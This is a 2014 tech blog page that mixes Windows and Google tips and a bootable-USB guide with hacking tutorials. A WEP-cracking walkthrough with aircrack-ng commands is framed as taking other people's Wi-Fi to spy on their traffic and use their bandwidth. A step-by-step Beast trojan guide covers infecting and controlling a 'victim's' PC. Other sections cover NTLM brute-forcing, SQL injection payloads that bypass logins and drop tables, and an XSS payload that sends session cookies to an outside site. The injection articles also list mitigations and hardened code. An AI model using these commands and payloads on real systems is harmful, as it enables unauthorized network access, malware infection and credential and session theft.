Nvidia releases the next Titan, the GTX Titan Black

Last year, Nvidia hoped to change the graphics card game when it released the GTX Titan, a high-performance, energy-efficient card. Now, Nvidia has released a new model of the Titan, the GTX Titan Black.

Defending the Earth from asteroids with high-powered nuclear explosions

Just over a year ago, the Chelyabinsk meteor entered Earth’s atmosphere, streaked across the southern Urals, and detonated in a fireball that was briefly brighter than the sun.

Happiness is a warm iGun: Dumb gun requires smart watch to shoot.

Gun company Armatix hopes to take the smart device industry by storm with its new smart gun system.

Flappy Bird’s removal from the app store: A case for piracy

Flappy Bird’s developer, Dong Nguyen, has broken his radio silence to say that he pulled the game for the sake of your well-being.

Metal Gear Solid

Metal Gear Solid 5 runs at 1080p on PS4, limited to 720p on Xbox One. The PS3, Xbox 360, PS4, and Xbox One will all receive versions of this game, and it seems as if the difference between each console is incredibly stark.

Wednesday, February 26, 2014

Hack Wi-Fi: Cracking WEP Passwords with Aircrack-Ng

Welcome back, my rookie hackers!
When Wi-Fi was first developed and popularized in the late '90s, security was not a major concern. Unlike wired connections, anyone could simply connect to a Wi-Fi access point (AP) and steal bandwidth, or worse—sniff the traffic.
The first attempt at securing these access points was termed Wired Equivalent Privacy, or simply WEP. This encryption method has been around for quite a while and a number of weaknesses have been discovered. It has been largely replaced by WPA and WPA2.
Despite these known weaknesses, there are still a significant number of these legacy APs in use. I was recently (July 2013) working at a major U.S. Department of Defense contractor in Northern Virginia, and in that building, probably a quarter of the wireless APs were still using WEP!

Apparently, a number of home users and small businesses bought their APs years ago, have never upgraded, and don't realize or don't care about their lack of security.
The flaws in WEP make it susceptible to various statistical cracking techniques. WEP uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) be random. The implementation of RC4 in WEP repeats that IV about every 6,000 frames. If we can capture enough of the IVs, we can decipher the key!
Now, you might be asking yourself, "Why would I want to hack Wi-Fi when I have my own Wi-Fi router and access?" The answer is multi-fold.
First, if you hack someone else's Wi-Fi router, you can navigate around the web anonymously, or more precisely, with someone else's IP address. Second, once you hack the Wi-Fi router, you can decrypt their traffic and use a sniffing tool like Wireshark or tcpdump to capture and spy on all of their traffic. Third, if you use torrents to download large files, you can use someone else's bandwidth, rather than your own.

Let's take a look at cracking WEP with the best wireless hacking tool available, aircrack-ng! Hacking wireless is one of my personal favorites!

Step 1: Open Aircrack-Ng in BackTrack

Let's start by firing up BackTrack and making certain that our wireless adapter is recognized and operational.
  • iwconfig

Let's note that our wireless adapter is recognized by BackTrack and is renamed wlan0. Yours may be wlan1 or wlan2.

Step 2: Put the Wireless Adapter into Monitor Mode

Next, we need to put the wireless adapter into monitor or promiscuous mode. We can do that by typing:
  • airmon-ng start wlan0

Note that the interface's name has been changed to mon0 by airmon-ng.

Step 3: Start Capturing Traffic

We now need to start capturing traffic. We do this by using the airodump-ng command with the monitoring interface, mon0.
  • airodump-ng mon0

As we can see, we are now able to see all the APs and clients within our range!

Step 4: Start a Specific Capture on the AP

As you can see from the screenshot above, there are several APs with WEP encryption. Let's target the second one from the top with the ESSID of "wonderhowto." Let's copy the BSSID from this AP and begin a capture on that AP.
  • airodump-ng --bssid 00:09:5B:6F:64:1E -c 11 -w WEPcrack mon0

This will start capturing packets from the SSID "wonderhowto" on channel 11 and write them to file WEPcrack in the pcap format. This command alone will now allow us to capture packets in order to crack the WEP key, if we are VERY patient.
But we're not patient, we want it now! We want to crack this key ASAP, and to do that, we will need to inject packets into the AP.
We now need to wait for someone to connect to the AP so that we can get the MAC address from their network card. When we have their MAC address, we can spoof their MAC and inject packets into their AP. As we can see at the bottom of the screenshot, someone has connected to the "wonderhowto" AP. Now we can hasten our attack!

Step 5: Inject ARP Traffic

To spoof their MAC and inject packets, we can use the aireplay-ng command. We need the BSSID of the AP and the MAC address of the client who connected to the AP. We will be capturing an ARP packet and then replaying that ARP thousands of times in order to generate the IVs that we need to crack WEP.
  • aireplay-ng -3 -b 00:09:5B:6F:64:1E -h 44:60:57:c8:58:A0 mon0

Now when we inject the ARPs into the AP, we will capture the IVs that are generated in our airodump file WEPcrack.

Step 6: Crack the Password

Once we have several thousand IVs in our WEPcrack file, all we need to do is run that file against aircrack-ng, such as this:
  • aircrack-ng WEPcrack-01.cap

If we have enough IVs, aircrack-ng will display the key on our screen, usually in hexadecimal format. Simply take that hex key and apply it when logging into the remote AP and you have free wireless!

Top 10 Windows 7 tips

Windows 7 keyboard shortcuts

Use the below Windows 7 keyboard shortcuts to make the most of your Windows 7 experience.
Windows key and the arrow keys
Pressing the Windows key and Left or Right arrow keys will dock the window you're viewing to the left or right-hand side of the screen. Pressing the Windows key and the Up arrow will maximize a window and pressing the Windows key and the Down arrow will resize and then minimize the window.
Use Shift: To stretch a window vertically, press the Windows key + Shift + the Up arrow. If you have multiple monitors use the Windows key + Shift + the Left or Right arrow keys to move the window to another monitor.
Windows key and plus and minus keys
If you ever need to zoom in or out of what is being displayed on your screen press the Windows key and the + (plus) or – (minus) keys. Pressing the plus zooms in and once zoomed in the minus will zoom out.
Clear all background programs
If you are not viewing a window in full screen and have other windows open in the background, clear all background open windows by pressing the Windows key + the Home key.

Use the Windows 7 search

Find and run anything in Windows by using the Windows 7 search box. Click the Start orb or press the Windows key and type the name of the program you wish to run or file you wish to edit. Windows 7 will usually do a good job at finding an exact match and simply pressing Enter will execute that program or open that file. If more than one match is found, use the up and down arrow keys to select the file you wish to open and then press Enter.


Running as administrator: Some programs may require administrator mode in order to function properly. You can run any program as administrator from the search box by typing the name of the program you want to run and then instead of pressing Enter to run the program press Ctrl+Shift+Enter to run as administrator. If you want to click and run a program as administrator hold down the Ctrl+Shift and then click the icon.

Take full advantage of the Taskbar

Pin programs to the Taskbar
All programs can be pinned to the Taskbar and allow easy access to your favorite programs without having to use the Start Menu. To Pin a program to the Taskbar right-click on the program or shortcut to the program and in the menu choose the Pin to Taskbar option. Alternatively you can also drag the icon to the Taskbar.
If you want to remove a pinned program, right-click on the Taskbar icon and click Unpin this program from the Taskbar. Alternatively you can also drag the icon off of the Taskbar and then click Unpin this program from the Taskbar.
Move the icons and pinned programs
Any pinned or opened program on the Taskbar can be moved and arranged. Left-click on any icon on the Taskbar and drag it to the location you want it to remain.
Windows key and a number
Pressing the Windows key and a number on the top row of your keyboard will open the window corresponding to the open program on your Taskbar. For example, in the below picture of the Windows 7 Taskbar, Firefox is the first icon, Control Panel is the second icon, and Adobe Photoshop is the third icon. If the Windows key + 3 was pressed, Adobe Photoshop would become the active window. To make it even easier, arrange your icons (as mentioned above) from left to right by most frequently opened.


Pin your favorite folder
If you frequently access the same folder (e.g. your favorites, my documents, Dropbox, etc.) pin the folder to the Windows Explorer icon on the Taskbar. To do this drag your favorite folder to the Taskbar until you see Pin to Windows Explorer. Once pinned, right-click the Explorer icon to access that folder under the Pinned section.
Open a second instance
If you want to open a second instance or window of a program that is already open, press and hold the Shift key and then click the program icon on the Taskbar.
Get to the Desktop
Click the Desktop button on the far right edge of the Taskbar to get to the Desktop.

Customize the Notification area

Windows Vista and Windows 7 allow the Windows Notification area (aka Systray) to be modified. By default, many of the icons shown in the past are now hidden and give Windows a much cleaner look. Customize this area to make icons show or not show by clicking on the up arrow next to the icons and selecting Customize, as shown in the picture to the right. Once in Customize you can choose what programs show, don’t show, or only show notifications.

Improve the quality of your text

Use the Windows ClearType Text Tuner to improve the overall quality of all text you read on your screen. To start the ClearType Text Tuner, click the Start orb, type cttune.exe and press Enter.

Enable and disable Windows 7 features

Turn Windows features on and off by clicking Start, typing features, and pressing Enter. In the left-hand column of the Programs and Features window, click Turn Windows features on or off, and in the Windows Features box check or uncheck the features you want enabled or disabled.

Use the Reliability and Performance Monitor

View the reliability history of your computer by using the Reliability Monitor. Click the Start orb and type reliability and press enter for View Reliability History. In the Reliability Monitor, you’ll be able to view the overall reliability of your computer and be able to identify any past problems your computer has had.
If you want to view the performance of your computer in real time, use the Performance Monitor. Click the Start orb, type performance and press Enter for the Performance Monitor. In the Performance Monitor, you can view your computer's performance in real time or view a log of your system's performance.

Re-enable underlined keyboard shortcuts

By default, Windows 7 has the underlines for keyboard shortcuts like those shown in the picture to the right disabled. To re-enable these underlines in all Windows programs follow the below steps.
  1. Open the Control Panel
  2. In the Control Panel click Ease of Access
  3. In Ease of Access click Change how your keyboard works
  4. Finally, check the Underline keyboard shortcuts and access keys and then click Ok.

Rename multiple files at once

To change the name of multiple files at once highlight all the files you wish to rename in Windows Explorer and press the F2 key. Type in the new name you wish to use for all files and press enter. Once done all files will be renamed to the name entered followed by a unique number.

Install Windows Essentials

Install missing Windows software by installing the free Windows Essentials software package that includes: Windows Live Family Safety, Windows Live Mail, Windows Live Messenger, SkyDrive for Windows, Windows Movie Maker, Windows Photo Gallery, Windows Live Writer, and Microsoft Outlook Hotmail Connector.

Top 10 Google Tricks

Below is a list of our top ten Google tricks many people who use Google don’t know about.

Definitions

Pull up the definition of the word by typing define followed by the word you want the definition for. For example, typing: define bravura would display the definition of that word.

Local search

Visit Google Local, then enter the area you want to search and the keyword of the place you want to find. For example, typing: restaurant at the above link would display local restaurants.

Phone number lookup

Enter a full phone number with area code to display the name and address associated with that phone number.

Find weather and movies

Type “weather” or “movies” followed by a zip code or city and state to display current weather conditions or movie theaters in your area. For example, typing weather 84101 gives you the current weather conditions for Salt Lake City, UT and the next four days. Typing movies 84101 would give you a link for show times for movies in that area.

Track airline flight and packages

Enter the airline and flight number to display the status of an airline flight and its arrival time. For example, type: delta 123 to display this flight information if available.
Google can also give a direct link to package tracking information if you enter a UPS, FedEx or USPS tracking number.

Translate

Translate text, a full web page, or search by using the Google Language Tools.

Pages linked to you

See what other web pages are linking to your website or blog by typing link: followed by your URL. For example, typing link:http://raju2047.blogspot.com displays all pages linking to Computer Hope.

Find PDF results only

Add fileType: to your search to display results that only match a certain file type. For example, if you wanted to display PDF results only type: “dell xps” fileType:pdf – this is a great way to find online manuals.

Calculator

Use the Google Search engine as a calculator by typing a math problem in the search. For example, typing: 100 + 200 would display results as 300.

Stocks

Quickly get to a stock quote price, chart, and related links by typing the stock symbol in Google. For example, typing: msft will display the stock information for Microsoft.

Tuesday, February 25, 2014

TRY THESE GOOGLE EASTER EGGS


Google Now brings awesome search functionality to our Android devices. Apart from the usual information cards, there are many Easter egg surprises that make Google search even more fun. The recent holiday surprise from Android was the “let’s go caroling” search, which would bring up a list of Christmas carol karaokes. In case you don’t know about other Google search Easter eggs, here is a list of some weird Google search voice commands:

Open “Google Now” aka “Google search” and say the following


  • “Do a barrel roll”
  • “Askew” or “Tilt”
  • “What is the answer to life, the universe and everything?”
  • “What’s the loneliest number?”
  • “Make me a sandwich!”
  • “Sudo, Make me a sandwich”
  • “When am I?”
  • “Who’s on first”
  • “What is your favorite color?”
  • “Who are you?”
  • “What is the airspeed velocity of an unladen swallow?”
  • “What is the nature of the universe?”
  • “How much wood could a woodchuck chuck if a woodchuck could chuck wood”
  • “What is (celebrity’s name)’s bacon number?”
  • “Beam me up, Scotty!”
  • “Let’s go caroling”

After each of these commands, you should get some witty answer or a fun karaoke: a little something to keep us Android fans smiling.

Saturday, February 22, 2014

How to make bootable USB without any software?

This tutorial will help you in creating a bootable USB drive of Windows Vista and 7 which you can use to install Vista and 7 in any system. It might become very useful when you don't have access to DVD drive.


Step 1: Insert your USB (4GB+ preferable) stick to the system and backup all the data from the USB as we are going to format the USB to make it as bootable.

Step 2: Open an elevated Command Prompt. To do this, type CMD in the Start menu search field and hit Ctrl + Shift + Enter. Alternatively, navigate to Start > All programs > Accessories, right-click on Command Prompt and select Run as administrator.

Step 3: When the Command Prompt opens, enter the following command:

DISKPART and hit enter.

LIST DISK and hit enter.

Once you enter the LIST DISK command, it will show the disk number of your USB drive. In the below image my USB drive disk no is Disk 1.

Step 4: In this step you need to enter all the below commands one by one and hit enter. As these commands are self explanatory, you can easily guess what these commands do.

SELECT DISK 1 (Replace DISK 1 with your disk number)

CLEAN

CREATE PARTITION PRIMARY

SELECT PARTITION 1

ACTIVE

FORMAT FS=NTFS

(Format process may take few seconds)

ASSIGN

EXIT


Step 7: Copy Windows  contents to USB.

You are done with your bootable USB. You can now use this bootable USB as bootable DVD on any computer that comes with USB boot feature (most of the current motherboards support this feature).

(If in case it doesn't work)


Step 8: Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “F” as my optical (DVD) drive letter and “H” as my USB drive letter.


Step 6: Go back to command prompt and execute the following commands:

F: and hit enter. Where “F” is your DVD drive letter.

CD BOOT and hit enter.

BOOTSECT.EXE /NT60 H:

(Where “H” is your USB drive letter)

If you do not have the disk and want to do this from the hard drive of another computer where you have the installation files, simply change the drive letter to that of the hard drive where the installation files are:

D:\Boot>BOOTSECT.EXE /NT60 H:
(Where “D” is the hard drive letter)



Note that this bootable USB guide will not work if you are trying to make a bootable USB on an XP computer.

Hack others computer using Beast trojan

Step 1:- Download the necessary software  Beast 2.07

Step 2:- Open the software


Step 3:- Now click on the “Build server” button.


Step 4:- Now in this window click on the notifications tab.
Step 5:- In the notifications tab click on the e-mail button.
Step 6:- Now in this window fill in your proper and valid email ID.


Step 7:- Now go to the “AV-FW kill” tab.


Step 8:- Now put a tick mark on “disable XP firewall”.


Step 9:- Now click on the “EXE icon” tab.
Step 10:- Select any icon and click on the “Save Server” button and the Trojan will be made.



 Step 11:-Now send this Trojan File to victim.

Step 12:- As and when the victim installs the Trojan on his system, you will get a notification e-mail at the e-mail ID you specified while making the Trojan. This e-mail consists of the IP address and port of the victim.

Step 13:-Put This IP address and Port in the place shown in the below snap-shot.


Step 14:- After that, click on the “Go Beast” button and you will be connected to the victim's PC.



Step 15:- Now select the action or task you want to execute on the victim's PC from the given list.

Step 16:- Now, to destroy or kill the Trojan, click on the “server” tab from the menu.

Step 17:- Now click on the “Kill Server” button and the Trojan will be destroyed from the victim's PC.

 Step 18:- You are Done Now.

How to Hack Computer Password using Cain and Abel

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

First, download the Cain & Abel software.

Open Cain & Abel and click on the Cracker option.


Select LM & NTLM Hashes and click the “+” sign.


Click on Next.


I want to recover the password of the “raaz” user name, so right-click on raaz > Brute Force Attack > NTLM Hashes.


Now you will see a window similar to the image below. Click on Start.


After the password recovery has finished successfully, it will show you the password, as in the image below.


SQL Injections Attack with Examples

This article explains the basics of SQL injection with an example that shows SQL injection, and provides methods to prevent these attacks.
As the name suggests, this attack is carried out with SQL queries. Many web developers are unaware of how an attacker can tamper with SQL queries. SQL injection can be done on a web application that doesn’t filter user input properly and trusts whatever the user provides. The idea of SQL injection is to make the application run undesired SQL queries.

All the examples mentioned in this article are tested with the following:
  • PHP 5.3.3-7
  • Apache/2.2.16
  • Postgresql 8.4

SQL Injection Example

Most web applications have a login page, so we will start with that. Let us assume the following code was written for the application.
index.html:
<html>
<head><title>SQL Injection Demo</title></head>
 <body onload="document.getElementById('user_name').focus();" >
 <form name="login_form" id="login_form" method="post" action="login.php">
  <table border=0 align="center" >
   <tr>
    <td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>
   </tr>
   <tr>
    <td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name" value=""></td>
   </tr>
   <tr>
    <td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word" value=""></td>
   </tr>
   <tr>
    <td colspan=2 align="center"><input type="submit" value="Login"></td>
   </tr>
  </table>
 </form>
</body>
</html>
When the user enters the user_name and pass_word, they will be posted to login.php via the HTTP POST method.
login.php:
<?php
$Host= '192.168.1.8';
$Dbname= 'john';
$User= 'john';
$Password= 'xxx';
$Schema = 'test'; 

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; 

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,PGSQL_CONNECT_FORCE_NEW); 

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
} 

$query="SELECT * from $Schema.members where user_name='".$_POST['user_name']."' and password='".$_POST['pass_word']."';"; 

$result=pg_query($Connect,$query);
$rows = pg_num_rows($result);
if ($rows) {
 echo "Login Success";
}
else {
 echo "Login Failed";
}
?>
Line 19 in the above code (i.e. the line that starts with “$query="SELECT * ...”) is vulnerable to SQL injection. The SQL query is designed to match the given username and password against the database. It works properly if the user provides a valid username and password. But an attacker can craft the input as follows:
In the username field, instead of providing a username, the attacker can enter the following:
' or 1=1;--
The attacker can then leave the password field empty.
When the attacker clicks submit, the details will be posted to login.php. In login.php the query will be framed as follows:
SELECT * from test.members where user_name='' or 1=1;--' and password='';
The above is a valid SQL query. In PostgreSQL, -- is the comment marker, so everything after -- is treated as a comment and is not executed. PostgreSQL will now execute:
select * from test.members where user_name='' or 1=1;
The condition 1=1 is always true, so the query returns rows and the application shows the “Login Success” message.
If the attacker knows the names of the database tables, he can even drop those tables by giving the following input in the username field:
';drop table test.lop;--
Some login applications tend to do the following:
  • Store the password as an md5 hash in the database.
  • First select the username and password from the database, based on the username provided.
  • Then md5 the password given by the user, and compare it with the password retrieved from the database.
  • If both match, the login succeeds.
Let’s see how this can be bypassed if the query is vulnerable to SQL injection.
login.php:
$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; 

$result=pg_query($Connect,$query); 

$row=pg_fetch_array($result,NULL,PGSQL_ASSOC); 

# Find the md5 for the user supplied password.
$user_pass = md5($_POST['pass_word']); 

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login Failed\n";
}
else {
 echo "Login Success\n";
}
Now enter the following in the username field
' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70
Enter “123” in the password field and click submit. md5(123) is 202cb962ac59075b964b07152d234b70
Now the query would expand as follows:
SELECT user_name,password from test.members where user_name='' UNION ALL SELECT 'laksh','202cb962ac59075b964b07152d234b70';
When the above query is executed, the database will return ‘laksh’ as the username and ‘202cb962ac59075b964b07152d234b70’ as the password.
We also posted “123” in the pass_word field, so strcmp will return 0 and the authentication will succeed.
The above are just a couple of examples of SQL injection attacks. There are a lot of variations. Following are some of the things you can do to reduce the possibility of SQL injection attacks.
  • Strict type checking ( Don’t trust what the user enters )
  • If you expect user name to be entered, then validate whether it contains only alpha numerals.
  • Escape or filter the special characters and user inputs.
  • Use prepared statements to execute the queries.
  • Don’t allow multiple queries to be executed on a single statement.
  • Don’t leak the database information to the end user by displaying the “syntax errors”, etc.
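The mitigations listed above, applied to the login check, as an added example that is not part of the original article. It uses PDO with an in-memory SQLite table standing in for the article's PostgreSQL test.members table (an assumption, so that it runs offline); the sample account, the function names and the user-name policy are constructed for illustration.

```php
<?php
// Added example (not the article's code). Requires the pdo_sqlite extension.
// An in-memory SQLite table stands in for the article's PostgreSQL test.members.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (user_name TEXT PRIMARY KEY, password TEXT NOT NULL)');

// Constructed sample account. password_hash() is used instead of the
// article's unsalted md5 so that a leaked table is harder to crack.
$db->prepare('INSERT INTO members (user_name, password) VALUES (?, ?)')
   ->execute(['laksh', password_hash('sample-Passw0rd', PASSWORD_DEFAULT)]);

// Prepared statement: the SQL text is fixed and the user name is bound as
// data, so quotes, "--" and UNION inside it are never parsed as SQL.
// With the article's pg_* API the equivalent call is
// pg_query_params($Connect, 'SELECT ... WHERE user_name = $1', array($user)).
function find_hash(PDO $db, string $user): ?string {
    $st = $db->prepare('SELECT password FROM members WHERE user_name = :u');
    $st->execute([':u' => $user]);
    $hash = $st->fetchColumn();
    return is_string($hash) ? $hash : null;
}

function login(PDO $db, $user, $pass): bool {
    // Strict type checking: array-valued POST fields are rejected outright.
    if (!is_string($user) || !is_string($pass)) {
        return false;
    }
    // Allow-list validation: alphanumerics and underscore only (assumed policy).
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $user)) {
        return false;
    }
    try {
        $hash = find_hash($db, $user);
    } catch (PDOException $ex) {
        // Log server-side; never echo database errors to the client.
        error_log('login query failed: ' . $ex->getMessage());
        return false;
    }
    return $hash !== null && password_verify($pass, $hash);
}

// The three inputs quoted in the article, plus one valid login.
$cases = [
    ['laksh', 'sample-Passw0rd', true],
    ["' or 1=1;--", '', false],
    ["';drop table test.lop;--", '', false],
    ["' UNION ALL SELECT 'laksh','" . md5('123'), '123', false],
];
foreach ($cases as [$u, $p, $expected]) {
    // Binding alone already defeats the injection: no row matches ...
    if ($u !== 'laksh' && find_hash($db, $u) !== null) {
        throw new RuntimeException('bound parameter matched a row');
    }
    // ... and the full login check gives the expected verdict.
    if (login($db, $u, $p) !== $expected) {
        throw new RuntimeException("unexpected result for: $u");
    }
    echo ($expected ? 'accepted' : 'rejected'), ': ', $u, PHP_EOL;
}
// Only the fixed SELECT ever ran: the table still holds its one row.
$count = (int) $db->query('SELECT COUNT(*) FROM members')->fetchColumn();
echo "rows in members: $count", PHP_EOL;
```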

Cross-site Scripting with Examples

In the previous article of this series, we explained how to prevent SQL injection attacks. In this article we will see a different kind of attack, called XSS.

XSS stands for Cross Site Scripting.


XSS is very similar to SQL-Injection. In SQL-Injection we exploited the vulnerability by injecting SQL Queries as user inputs. In XSS, we inject code (basically client side scripting) to the remote server.

Types of Cross Site Scripting


XSS attacks are broadly classified into 2 types:

Non-Persistent
Persistent

1. Non-Persistent XSS Attack

A non-persistent attack requires a user to visit a link specially crafted by the attacker. When the user visits the link, the crafted code is executed by the user’s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS

index.php:

<?php
$name = $_GET['name'];
echo "Welcome $name<br>";
echo '<a href="http://xssattackexamples.com/">Click to Download</a>';
?>
Example 1:
Now the attacker will craft a URL as follows and send it to the victim:
index.php?name=guest<script>alert('attacked')</script>
When the victim loads the above URL in the browser, he will see an alert box which says ‘attacked’. Even though this example doesn’t do any damage, other than the annoying ‘attacked’ pop-up, you can see how an attacker can use this method to do several damaging things.

Example 2:
For example, the attacker can now try to change the target URL of the link “Click to Download”. Instead of the link going to the “xssattackexamples.com” website, he can redirect it to “not-real-xssattackexamples.com” by crafting the URL as shown below:

index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>
In the above, we set the function to run on “window.onload”, because the website (i.e. index.php) echoes the given name first and only then outputs the <a> tag. So if we write it directly, as shown below, it will not work, because those statements get executed before the <a> tag is echoed:
index.php?name=<script>var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com"</script>
Normally an attacker tends not to craft a URL that a human can read directly. So he will encode the ASCII characters to hex as follows:
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
which is the same as
index.php?name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href="http://not-real-xssattackexamples.com/";}</script>
Now the victim may not know what it is, because he cannot directly see that the URL is crafted, and there is a greater chance that he will visit the URL.

2. Persistent XSS Attack

In a persistent attack, the code injected by the attacker is stored on a secondary storage device (mostly in a database). The damage caused by a persistent attack is greater than that of a non-persistent attack. Here we will see how to hijack another user’s session by performing XSS.
Session
HTTP is a stateless protocol, which means it won’t maintain any state with regard to requests and responses. All requests and responses are independent of each other. But this is not what most web applications need. Once the user has authenticated himself, the web server should not ask for the username/password on the next request from the user. To do this, the application needs to maintain some kind of state between the web browser and the web server, which is done through “sessions”.
When the user logs in for the first time, a session ID is created by the web server and sent to the web browser as a “cookie”. All subsequent requests to the web server will be identified by the “session id” in the cookie.
Examples for Persistent XSS Attack
The sample web application given below, which demonstrates the persistent XSS attack, does the following:
There are two types of users: “Admin” and “Normal” user.
  • When “Admin” logs in, he can see the list of usernames.
  • When “Normal” users log in, they can only update their display name.

login.php:
<?php
$Host= '192.168.1.8';
$Dbname= 'app';
$User= 'yyy';
$Password= 'xxx';
$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/
$Connect=pg_connect($Conection_string,PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */
if (!$Connect) {
 echo "Database Connection Failure";
 exit;
}

$query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';";

$result=pg_query($Connect,$query);
$row=pg_fetch_array($result,NULL,PGSQL_ASSOC);

$user_pass = md5($_POST['pass_word']);
$user_name = $row['user_name'];

if(strcmp($user_pass,$row['password'])!=0) {
 echo "Login failed";
}
else {
 # Start the session
 session_start();
 $_SESSION['USER_NAME'] = $user_name;
 echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>";
}
?>
home.php
<?php
session_start();
if(!$_SESSION['USER_NAME']) {
 echo "Need to login";
}
else {
 $Host= '192.168.1.8';
 $Dbname= 'app';
 $User= 'yyy';
 $Password= 'xxx';
 $Schema = 'test';
 $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";
 $Connect=pg_connect($Conection_string,PGSQL_CONNECT_FORCE_NEW);
 if($_SERVER['REQUEST_METHOD'] == "POST") {
  $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';";
  pg_query($Connect,$query);
  echo "Update Success";
 }
 else {
  if(strcmp($_SESSION['USER_NAME'],'admin')==0) {
   echo "Welcome admin<br><hr>";
   echo "List of user's are<br>";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]<br>";
   }
  }
  else {
   echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">";
   echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">";
   echo "<input type=\"submit\" value=\"Update\">";
   echo "</form>";
  }
 }
}
?>
Now the attacker logs in as a normal user and enters the following in the textbox as his display name:
<a href=# onclick=\"document.location=\'http://not-real-xssattackexamples.com/xss.php?c=\'+escape\(document.cookie\)\;\">My Name</a>
The above information entered by the attacker will be stored in the database (persistent).
Now, when the admin logs in to the system, he will see a link named “My Name” along with the other usernames. When the admin clicks the link, it will send the cookie, which holds the session ID, to the attacker’s site. Now the attacker can send requests to the web server using that session ID and act as “Admin” until the session expires. The cookie information will be something like the following:
xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3
Once the hacker knows the PHPSESSID, he can use this session to get the admin privilege until the PHPSESSID expires.
To understand this better, we can use a Firefox add-on called “Tamper Data”, which can be used to add a new HTTP header called “Cookies” and set the value to “PHPSESSID=vmcsjsgear6gsogpu7o2imr9f3”.
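Output encoding and session-cookie flags applied to the two cases above (the reflected name parameter of index.php and the stored display_name listed by home.php), as an added example that is not part of the original article. The function names and the shortened stand-in payloads are constructed for illustration, and the cookie settings assume PHP 7.3+ on a site served over HTTPS.

```php
<?php
// Added example (not the article's code).

// Encode untrusted text for HTML body text or a quoted attribute value.
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// index.php, hardened: the name parameter is encoded before it is echoed.
function render_welcome(array $get): string {
    $name = (isset($get['name']) && is_string($get['name'])) ? $get['name'] : 'guest';
    return 'Welcome ' . e($name) . '<br>'
         . '<a href="http://xssattackexamples.com/">Click to Download</a>';
}

// home.php admin view, hardened: stored display names are encoded on output,
// so markup saved by another user is shown as text instead of being rendered.
function render_user_list(array $display_names): string {
    $out = 'Welcome admin<br><hr>List of users:<br>';
    foreach ($display_names as $dn) {
        $out .= e((string) $dn) . '<br>';
    }
    return $out;
}

// Session cookie flags (the array form needs PHP 7.3+). HttpOnly keeps the
// session ID out of document.cookie, so script running in the page cannot
// read it; Secure assumes HTTPS. Call this before any output in a web
// request; it is not invoked in this offline demo.
function start_hardened_session(): void {
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}
// In login.php, call session_regenerate_id(true) right after a successful
// login so that a session ID issued before authentication is discarded.

// Constructed inputs with the same shape as the article's payloads.
$reflected = "guest<script>alert('attacked')</script>";
// PHP percent-decodes the query string before filling $_GET, so the
// hex-encoded URL form reaches the application as the same string.
$hex_form  = rawurldecode('guest%3cscript%3ealert(%27attacked%27)%3c%2fscript%3e');
$stored    = ['alice', '<a href=# onclick="alert(1)">My Name</a>'];

if ($hex_form !== $reflected) {
    throw new RuntimeException('decoded form differs from the plain form');
}
$pages = [
    render_welcome(['name' => $reflected]),
    render_welcome(['name' => $hex_form]),
    render_user_list($stored),
];
foreach ($pages as $html) {
    // Only the template's own tags may remain; no injected markup.
    if (stripos($html, '<script') !== false || stripos($html, '<a href=#') !== false) {
        throw new RuntimeException('untrusted markup reached the page unencoded');
    }
    echo $html, PHP_EOL;
}
```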